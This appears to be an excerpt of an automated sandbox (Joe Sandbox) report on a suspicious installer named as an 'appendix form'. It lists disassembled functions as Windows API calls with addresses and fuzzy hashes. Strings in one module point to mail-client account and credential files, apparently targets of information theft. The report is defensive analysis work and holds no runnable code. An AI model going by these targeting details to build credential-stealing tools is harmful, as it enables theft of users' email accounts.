• Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: Global$AllocFileFree$CloseDeleteHandleWrite
• String ID:
• API String ID: 3294113728-0
• Opcode ID: f6813a6ec52387077f45cd6a5d7e66dc1a82678df2c2094744b3b0aeb8f892d5
• Instruction ID: 61f3ed29154f776cadf79894fffc4e7c3199e3b8836c730970b54a9edadab088
• Opcode Fuzzy Hash: f6813a6ec52387077f45cd6a5d7e66dc1a82678df2c2094744b3b0aeb8f892d5
• Instruction Fuzzy Hash: 23318D71C00128BBDF216FA5DD49D9E7A79EF09364F10422AF5207A2E1C7794C419BA9
APIs
• lstrlenA.KERNEL32(0041F4C0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C53,00000000,?), ref: 00405004
• lstrlenA.KERNEL32(00402C53,0041F4C0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C53,00000000), ref: 00405014
• lstrcatA.KERNEL32(0041F4C0,00402C53,00402C53,0041F4C0,00000000,00000000,00000000), ref: 00405027
• SetWindowTextA.USER32(0041F4C0,0041F4C0), ref: 00405039
• SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040505F
• SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405079
• SendMessageA.USER32(?,00001013,?,00000000), ref: 00405087
Memory Dump Source
• Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: MessageSend$lstrlen$TextWindowlstrcat
• String ID:
• API String ID: 2531174081-0
• Opcode ID: 24f52add238690ae2ba30c5bae490f19be7bb152a922a23f2cfa91187b438abe
• Instruction ID: 5a4c84274bcf923500a8bde6a880dece6f7157f711da0bf1dba54453946cb231
• Opcode Fuzzy Hash: 24f52add238690ae2ba30c5bae490f19be7bb152a922a23f2cfa91187b438abe
• Instruction Fuzzy Hash: 40218C71900508BBDB119FA5CD84ADFBFA9EF04354F04807AF948A6290C3798E819FA8
APIs
  • Part of subcall function 333E9221: _free.LIBCMT ref: 333E924A
• _free.LIBCMT ref: 333E92AB
  • Part of subcall function 333E571E: HeapFree.KERNEL32(00000000,00000000,?,333E924F,?,00000000,?,00000000,?,333E9276,?,00000007,?,?,333E7E5A,?), ref: 333E5734
  • Part of subcall function 333E571E: GetLastError.KERNEL32(?,?,333E924F,?,00000000,?,00000000,?,333E9276,?,00000007,?,?,333E7E5A,?,?), ref: 333E5746
• _free.LIBCMT ref: 333E92B6
• _free.LIBCMT ref: 333E92C1
• _free.LIBCMT ref: 333E9315
• _free.LIBCMT ref: 333E9320
• _free.LIBCMT ref: 333E932B
• _free.LIBCMT ref: 333E9336
Memory Dump Source
• Source File: 00000004.00000002.2623612022.00000000333E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 333E0000, based on PE: true
• Associated: 00000004.00000002.2623547319.00000000333E0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.2623612022.00000000333F6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_333e0000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
• Instruction ID: 995e421c5028273f0f698f78e21c9e8b829da10dad05f2ccd26f80b27bb6ad3b
• Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
• Instruction Fuzzy Hash: 6A117F73D40B2CEAEA60AFB0DDC5FCB7B9D9F04700F408825B6D97A852DA28B5146751
                                                                                                              APIs
                                                                                                              • DestroyWindow.USER32(?,00000000), ref: 00402BF4
                                                                                                              • GetTickCount.KERNEL32 ref: 00402C12
                                                                                                              • wsprintfA.USER32 ref: 00402C40
                                                                                                                • Part of subcall function 00404FCB: lstrlenA.KERNEL32(0041F4C0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C53,00000000,?), ref: 00405004
                                                                                                                • Part of subcall function 00404FCB: lstrlenA.KERNEL32(00402C53,0041F4C0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C53,00000000), ref: 00405014
                                                                                                                • Part of subcall function 00404FCB: lstrcatA.KERNEL32(0041F4C0,00402C53,00402C53,0041F4C0,00000000,00000000,00000000), ref: 00405027
                                                                                                                • Part of subcall function 00404FCB: SetWindowTextA.USER32(0041F4C0,0041F4C0), ref: 00405039
                                                                                                                • Part of subcall function 00404FCB: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040505F
                                                                                                                • Part of subcall function 00404FCB: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405079
                                                                                                                • Part of subcall function 00404FCB: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405087
                                                                                                              • CreateDialogParamA.USER32(0000006F,00000000,00402B44,00000000), ref: 00402C64
                                                                                                              • ShowWindow.USER32(00000000,00000005), ref: 00402C72
                                                                                                                • Part of subcall function 00402BC0: MulDiv.KERNEL32(?,00000064,?), ref: 00402BD5
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                               • Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                              • String ID: ... %d%%
                                                                                                              • API String ID: 722711167-2449383134
                                                                                                              • Opcode ID: f2267b28db3a5fe3cb10dbc160883a1cbec363296c6093f2343f828124788bd0
                                                                                                              • Instruction ID: d07fb7ba5d8a9df6441e3fcaec0217ab1422bd56783a7a7703193e57ef262099
                                                                                                              • Opcode Fuzzy Hash: f2267b28db3a5fe3cb10dbc160883a1cbec363296c6093f2343f828124788bd0
                                                                                                              • Instruction Fuzzy Hash: C901C870946210ABE721AF64AF0DFAE7778A7017057044237F601B11E0C6B8E541D69E
                                                                                                              APIs
                                                                                                              • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004048B1
                                                                                                              • GetMessagePos.USER32 ref: 004048B9
                                                                                                              • ScreenToClient.USER32(?,?), ref: 004048D3
                                                                                                              • SendMessageA.USER32(?,00001111,00000000,?), ref: 004048E5
                                                                                                              • SendMessageA.USER32(?,0000110C,00000000,?), ref: 0040490B
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                               • Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Message$Send$ClientScreen
                                                                                                              • String ID: f
                                                                                                              • API String ID: 41195575-1993550816
                                                                                                              • Opcode ID: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
                                                                                                              • Instruction ID: db44c4f697662905fd107a60ff49d2a7fca4051012713ef620924bffaa5b50c0
                                                                                                              • Opcode Fuzzy Hash: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
                                                                                                              • Instruction Fuzzy Hash: 97014C75D00218BAEB01DBA4DC85BFFBBBCAB55711F10412BBB10B62D0C7B4A9418BA5
                                                                                                              APIs
                                                                                                              • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402B5F
                                                                                                              • wsprintfA.USER32 ref: 00402B93
                                                                                                              • SetWindowTextA.USER32(?,?), ref: 00402BA3
                                                                                                              • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BB5
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                               • Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                                                              • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                              • API String ID: 1451636040-1158693248
                                                                                                              • Opcode ID: eb69263b85c0967037015140e31ace042ee7bd246636b1be7c2271423c491acf
                                                                                                              • Instruction ID: 3f5ce1fcf3cb01a0fa9ccaf83f12fe0bb2d46f1b1d5dc84fd7777e7c50a39ee5
                                                                                                              • Opcode Fuzzy Hash: eb69263b85c0967037015140e31ace042ee7bd246636b1be7c2271423c491acf
                                                                                                              • Instruction Fuzzy Hash: D5F01270900109BBDF205F60CD0ABAE3779AB00345F00803AFA16B52D1D7F86A558B99
                                                                                                              APIs
                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,333E6FFD,00000000,?,?,?,333E8A72,?,?,00000100), ref: 333E887B
                                                                                                              • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,?,?,?,?,333E8A72,?,?,00000100,5EFC4D8B,?,?), ref: 333E8901
                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 333E89FB
                                                                                                              • __freea.LIBCMT ref: 333E8A08
                                                                                                                • Part of subcall function 333E56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 333E5702
                                                                                                              • __freea.LIBCMT ref: 333E8A11
                                                                                                              • __freea.LIBCMT ref: 333E8A36
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2623612022.00000000333E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 333E0000, based on PE: true
                                                                                                               • Associated: 00000004.00000002.2623547319.00000000333E0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                               • Associated: 00000004.00000002.2623612022.00000000333F6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_333e0000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                              • String ID:
                                                                                                              • API String ID: 1414292761-0
                                                                                                              • Opcode ID: 014591b6d04cd15371b9ece0ec5838426b041c2985a7385cd1bf955924309b95
                                                                                                              • Instruction ID: b927f1013664f633fa0ee7e5701455952ceca887ee451b9b771237398459ec06
                                                                                                              • Opcode Fuzzy Hash: 014591b6d04cd15371b9ece0ec5838426b041c2985a7385cd1bf955924309b95
                                                                                                              • Instruction Fuzzy Hash: D451B4B3E10326AFEB158E64CC80FAB77A9EF44B56F558629FC04DA140EB35DC5086D1
                                                                                                              APIs
                                                                                                              • _strlen.LIBCMT ref: 333E1607
                                                                                                              • _strcat.LIBCMT ref: 333E161D
                                                                                                              • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,333E190E,?,?,00000000,?,00000000), ref: 333E1643
                                                                                                              • lstrcatW.KERNEL32(?,?,?,?,?,?,333E190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 333E165A
                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,?,333E190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 333E1661
                                                                                                              • lstrcatW.KERNEL32(00001008,?,?,?,?,?,333E190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 333E1686
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2623612022.00000000333E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 333E0000, based on PE: true
                                                                                                               • Associated: 00000004.00000002.2623547319.00000000333E0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                               • Associated: 00000004.00000002.2623612022.00000000333F6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_333e0000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: lstrcatlstrlen$_strcat_strlen
                                                                                                              • String ID:
                                                                                                              • API String ID: 1922816806-0
                                                                                                              • Opcode ID: 561f9c76f310eedb334243844ac74dfd2fdad186787866f171634d30de7238bb
                                                                                                              • Instruction ID: e12a4f18200aa4f226b170a04a155af31e613241f22ba86246f00d72aec2a0f8
                                                                                                              • Opcode Fuzzy Hash: 561f9c76f310eedb334243844ac74dfd2fdad186787866f171634d30de7238bb
                                                                                                              • Instruction Fuzzy Hash: 7021B837D00314ABD7059F54ECC1EEEB7B8EF48710F14C41AE504EB141DB74A98187A5
                                                                                                              APIs
                                                                                                              • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 333E1038
                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 333E104B
                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 333E1061
                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 333E1075
                                                                                                              • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 333E1090
                                                                                                              • lstrlenW.KERNEL32(?,?,?,00000000), ref: 333E10B8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2623612022.00000000333E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 333E0000, based on PE: true
                                                                                                               • Associated: 00000004.00000002.2623547319.00000000333E0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                               • Associated: 00000004.00000002.2623612022.00000000333F6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_333e0000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: lstrlen$AttributesFilelstrcat
                                                                                                              • String ID:
                                                                                                              • API String ID: 3594823470-0
                                                                                                              • Opcode ID: 54bd72e7ff3d614ae894d1e07af5cec20323244d0c09dcc277f1d55891d3754f
                                                                                                              • Instruction ID: f5391b6fab49c908267672190ab52dc61c40d365a58bc551f12bda846e639f30
                                                                                                              • Opcode Fuzzy Hash: 54bd72e7ff3d614ae894d1e07af5cec20323244d0c09dcc277f1d55891d3754f
                                                                                                              • Instruction Fuzzy Hash: 11218177D003289BCF20DE61DC88EDB776DEF84325F148696E859971A1DE349E86CB80
                                                                                                              APIs
                                                                                                              • GetLastError.KERNEL32(?,?,333E3518,333E23F1,333E1F17), ref: 333E3864
                                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 333E3872
                                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 333E388B
                                                                                                              • SetLastError.KERNEL32(00000000,?,333E3518,333E23F1,333E1F17), ref: 333E38DD
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2623612022.00000000333E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 333E0000, based on PE: true
                                                                                                               • Associated: 00000004.00000002.2623547319.00000000333E0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                               • Associated: 00000004.00000002.2623612022.00000000333F6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_333e0000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                                              • String ID:
                                                                                                              • API String ID: 3852720340-0
                                                                                                              • Opcode ID: 4cb3b8c0672cd7c41ca43470aa61276cd1eae9dffe63f956333d890c7cfc1783
                                                                                                              • Instruction ID: a7a7dbbefede902d6120aacd49d6e77ee9e3e91ac5f24d0c223244330cb9d197
                                                                                                              • Opcode Fuzzy Hash: 4cb3b8c0672cd7c41ca43470aa61276cd1eae9dffe63f956333d890c7cfc1783
                                                                                                              • Instruction Fuzzy Hash: 8401F737E4C7339EF2142D79ACC49162BDCDF46776B60D23AE021A95D0EF16880A934B
                                                                                                              APIs
                                                                                                              • GetLastError.KERNEL32(?,?,333E6C6C), ref: 333E5AFA
                                                                                                              • _free.LIBCMT ref: 333E5B2D
                                                                                                              • _free.LIBCMT ref: 333E5B55
                                                                                                              • SetLastError.KERNEL32(00000000,?,?,333E6C6C), ref: 333E5B62
                                                                                                              • SetLastError.KERNEL32(00000000,?,?,333E6C6C), ref: 333E5B6E
                                                                                                              • _abort.LIBCMT ref: 333E5B74
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2623612022.00000000333E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 333E0000, based on PE: true
                                                                                                               • Associated: 00000004.00000002.2623547319.00000000333E0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                               • Associated: 00000004.00000002.2623612022.00000000333F6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_333e0000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$_free$_abort
                                                                                                              • String ID:
                                                                                                              • API String ID: 3160817290-0
                                                                                                              • Opcode ID: 73fd6633333a25068ae923be44b73d1fe97e3180f15dcec99b55a6b01cee91c2
                                                                                                              • Instruction ID: cee47e5423b3a4b8a33980a34dd9d643c479ec33a814465ce275c54baff29368
                                                                                                              • Opcode Fuzzy Hash: 73fd6633333a25068ae923be44b73d1fe97e3180f15dcec99b55a6b01cee91c2
                                                                                                              • Instruction Fuzzy Hash: 70F0283BD94732ABF2023E34AC84E5F27AD8FC25B2B28C024F825A6180FE65C8034164
                                                                                                              APIs
                                                                                                                • Part of subcall function 333E1E89: lstrlenW.KERNEL32(?,?,?,?,?,333E10DF,?,?,?,00000000), ref: 333E1E9A
                                                                                                                • Part of subcall function 333E1E89: lstrcatW.KERNEL32(?,?,?,333E10DF,?,?,?,00000000), ref: 333E1EAC
                                                                                                                • Part of subcall function 333E1E89: lstrlenW.KERNEL32(?,?,333E10DF,?,?,?,00000000), ref: 333E1EB3
                                                                                                                • Part of subcall function 333E1E89: lstrlenW.KERNEL32(?,?,333E10DF,?,?,?,00000000), ref: 333E1EC8
                                                                                                                • Part of subcall function 333E1E89: lstrcatW.KERNEL32(?,333E10DF,?,333E10DF,?,?,?,00000000), ref: 333E1ED3
                                                                                                              • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 333E122A
                                                                                                                • Part of subcall function 333E173A: _strlen.LIBCMT ref: 333E1855
                                                                                                                • Part of subcall function 333E173A: _strlen.LIBCMT ref: 333E1869
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2623612022.00000000333E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 333E0000, based on PE: true
                                                                                                               • Associated: 00000004.00000002.2623547319.00000000333E0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                               • Associated: 00000004.00000002.2623612022.00000000333F6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_333e0000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                                                              • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                              • API String ID: 4036392271-1520055953
                                                                                                              • Opcode ID: 4b2bfe38fc186e03de6e910a41ad8c4a6348af2edaa78c3cc394e28a860af702
                                                                                                              • Instruction ID: 3d259796d6dc0a5be6d96d4537161fe750c0102c971915ecc6b285f8894720e7
                                                                                                              • Opcode Fuzzy Hash: 4b2bfe38fc186e03de6e910a41ad8c4a6348af2edaa78c3cc394e28a860af702
                                                                                                              • Instruction Fuzzy Hash: 5121A57AE50318AAEB109BA0ECC1FEEB339EF80715F404556F605EB1D0E6B15D818759
                                                                                                              APIs
                                                                                                              • GetModuleHandleA.KERNEL32(00000000,?,000000F0), ref: 00401F93
                                                                                                                • Part of subcall function 00404FCB: lstrlenA.KERNEL32(0041F4C0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C53,00000000,?), ref: 00405004
                                                                                                                • Part of subcall function 00404FCB: lstrlenA.KERNEL32(00402C53,0041F4C0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C53,00000000), ref: 00405014
                                                                                                                • Part of subcall function 00404FCB: lstrcatA.KERNEL32(0041F4C0,00402C53,00402C53,0041F4C0,00000000,00000000,00000000), ref: 00405027
                                                                                                                • Part of subcall function 00404FCB: SetWindowTextA.USER32(0041F4C0,0041F4C0), ref: 00405039
                                                                                                                • Part of subcall function 00404FCB: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040505F
                                                                                                                • Part of subcall function 00404FCB: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405079
                                                                                                                • Part of subcall function 00404FCB: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405087
                                                                                                              • LoadLibraryExA.KERNEL32(00000000,?,00000008,?,000000F0), ref: 00401FA3
                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00401FB3
                                                                                                              • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,?,000000F0), ref: 0040201D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                              • String ID: `7B
                                                                                                              • API String ID: 2987980305-3208876730
                                                                                                              • Opcode ID: 2422ef51a1b6823f9c659da9030c5864fce0ccc280c30660f8fbdbd249992362
                                                                                                              • Instruction ID: 4f0a164b3c96300c60f35f0977c0e3ddcb7ae723504d3d42d940096a5cee0e9b
                                                                                                              • Opcode Fuzzy Hash: 2422ef51a1b6823f9c659da9030c5864fce0ccc280c30660f8fbdbd249992362
                                                                                                              • Instruction Fuzzy Hash: CA21EB72D04215FACF207FA48E4DA6E79B0AB4435CF20423BF601B62E0D7BD4942DA5E
                                                                                                              APIs
                                                                                                              • CharNextA.USER32(?,*?|<>/":,00000000,00429000,0042A400,0042A400,00000000,004031F1,0042A400,771B3410,004033CB), ref: 00405FA3
                                                                                                              • CharNextA.USER32(?,?,?,00000000), ref: 00405FB0
                                                                                                              • CharNextA.USER32(?,00429000,0042A400,0042A400,00000000,004031F1,0042A400,771B3410,004033CB), ref: 00405FB5
                                                                                                              • CharPrevA.USER32(?,?,0042A400,0042A400,00000000,004031F1,0042A400,771B3410,004033CB), ref: 00405FC5
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Char$Next$Prev
                                                                                                              • String ID: *?|<>/":
                                                                                                              • API String ID: 589700163-165019052
                                                                                                              • Opcode ID: 629f8b76d7fa33355aab091ca9466ab0ab0c1990dabb568f1c5d9d4edaa7ed44
                                                                                                              • Instruction ID: b0dad545636566696c56c87c00777fa542562a183f3785fc597fb34056e0d2ab
                                                                                                              • Opcode Fuzzy Hash: 629f8b76d7fa33355aab091ca9466ab0ab0c1990dabb568f1c5d9d4edaa7ed44
                                                                                                              • Instruction Fuzzy Hash: 08110161808B9269FB3216340C44B7BBF99CF5A760F28007BE9C0732C2D77C5C429A6D
                                                                                                              APIs
                                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,333E4AEA,?,?,333E4A8A,?,333F2238,0000000C,333E4BBD,00000000,00000000), ref: 333E4B59
                                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 333E4B6C
                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,333E4AEA,?,?,333E4A8A,?,333F2238,0000000C,333E4BBD,00000000,00000000,?,333E2082), ref: 333E4B8F
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2623612022.00000000333E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 333E0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2623547319.00000000333E0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000004.00000002.2623612022.00000000333F6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_333e0000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                              • Opcode ID: de3de40eb95751297d314b59a5f158927c93f28dbfe5c2b109a88dea1ebb324e
                                                                                                              • Instruction ID: 4976263695ef09b4c867f7d84da87d274761e09b891ed0753ca644b2ab18800f
                                                                                                              • Opcode Fuzzy Hash: de3de40eb95751297d314b59a5f158927c93f28dbfe5c2b109a88dea1ebb324e
                                                                                                              • Instruction Fuzzy Hash: 01F0A436910119BFCB11AF50CC08FAE7FFDEF09351F448154F805A6140DB358A42CB50
                                                                                                              APIs
                                                                                                              • lstrcatA.KERNEL32(00000000,00000000,004093B0,00429800,00000000,00000000,00000031), ref: 0040177E
                                                                                                              • CompareFileTime.KERNEL32(-00000014,?,004093B0,004093B0,00000000,00000000,004093B0,00429800,00000000,00000000,00000031), ref: 004017A8
                                                                                                                • Part of subcall function 00405CE0: lstrcpynA.KERNEL32(?,?,00000400,00403289,00422EE0,NSIS Error), ref: 00405CED
                                                                                                                • Part of subcall function 00404FCB: lstrlenA.KERNEL32(0041F4C0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C53,00000000,?), ref: 00405004
                                                                                                                • Part of subcall function 00404FCB: lstrlenA.KERNEL32(00402C53,0041F4C0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C53,00000000), ref: 00405014
                                                                                                                • Part of subcall function 00404FCB: lstrcatA.KERNEL32(0041F4C0,00402C53,00402C53,0041F4C0,00000000,00000000,00000000), ref: 00405027
                                                                                                                • Part of subcall function 00404FCB: SetWindowTextA.USER32(0041F4C0,0041F4C0), ref: 00405039
